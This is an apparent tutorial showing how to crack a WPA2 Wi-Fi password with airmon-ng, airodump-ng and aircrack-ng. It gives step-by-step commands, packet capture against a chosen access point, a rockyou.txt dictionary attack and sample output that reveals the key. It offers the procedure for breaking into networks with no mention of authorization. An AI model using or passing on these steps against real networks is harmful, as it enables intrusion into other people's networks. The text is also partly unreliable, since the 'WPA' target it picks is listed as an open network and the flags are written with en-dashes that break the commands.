This example assumes that you have a wireless adapter capable of entering motor mode and that you have the aircrack-ng suite of tools installed. These come pre-installed on the Kali Linux distribution.
Determine the adapter to use for capturing:
Make note of your wireless adapter interface, e.g. wlan0. Next we need to use airmon to enter into monitor mode.
airmon-ng start wlan0
If this has worked successfully it should have created another adapter, wlan0mon in our case. Next we can start with finding wireless networks to target. We can do this by running the airodump tool.
Below is an example of the Airodump output.
CH 9 ][ Elapsed: 1 min ][ 2007-04-26 17:41 ][ WPA handshake: 00:14:6C:7E:40:80
BSSID PWR RXQ Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID
00:09:5B:1C:AA:1D 11 16 10 0 0 11 54. OPN NETGEAR
00:14:6C:7A:41:81 34 100 57 14 1 9 11e WEP WEP bigbear
00:14:6C:7E:40:80 32 100 752 73 2 9 54 WPA TKIP PSK teddy
BSSID STATION PWR Rate Lost Packets Probes
00:14:6C:7A:41:81 00:0F:B5:32:31:31 51 36-24 2 14
(not associated) 00:14:A4:3F:8D:13 19 0-0 0 4 mossy
00:14:6C:7A:41:81 00:0C:41:52:D1:D1 -1 36-36 0 5
00:14:6C:7E:40:80 00:0F:B5:FD:FB:C2 35 54-54 0 99 teddy
We now need to pick a BSSID to target. Select your target access point, this example will target NETGEAR. The following will target only the NETGEAR SSID on channel 11 and write captured packets to capture.cap
airodump-ng wlan0mon –bssid 00:09:5B:1C:AA:1D –write capture.cap -c 11
Now wait until you start seeing the packet count and data increase on the network. The more authentication packets captured the better, you can force clients to disconnect and reconnect to the wireless network as to hurry this process along, this will be covered in a later article.
Once you have a good amount of captured packets, quit out of airodump. As this example is using wordlists to try and get the network password, we will be using the /usr/share/wordlists/rockyou.txt word list that is shipped with Kali.
You can use any wordlist you like, just change the path on the following command:
aircrack-ng capture.cap -w /usr/share/wordlists/rockyou.txt
You should see the progress being updated as aircrack-ng goes through the entries in the word list. The output will look something like below:
Aircrack-ng 0.7 r130
[00:00:03] 2230 keys tested (733.41 k/s)
KEY FOUND! [ password ]
Master Key : CD D7 9A 5A CF B0 70 C7 E9 D1 02 3B 87 02 85 D6
39 E4 30 B3 2F 31 AA 37 AC 82 5A 55 B5 55 24 EE
Transcient Key : 33 55 0B FC 4F 24 84 F4 9A 38 B3 D0 89 83 D2 49
73 F9 DE 89 67 A6 6D 2B 8E 46 2C 07 47 6A CE 08
AD FB 65 D6 13 A9 9F 2C 65 E4 A6 08 F2 5A 67 97
D9 6F 76 5B 8C D3 DF 13 2F BC DA 6A 6E D9 62 CD
EAPOL HMAC : 52 27 B8 3F 73 7C 45 A0 05 97 69 5C 30 78 60 BD
As you can see our password has been found. This is the most basic example of using the aircrack suite of tools to break into a WPA2 wireless network. The better the word list the higher chance of finding the password.
Check out our other articles on downloading different wordlists here.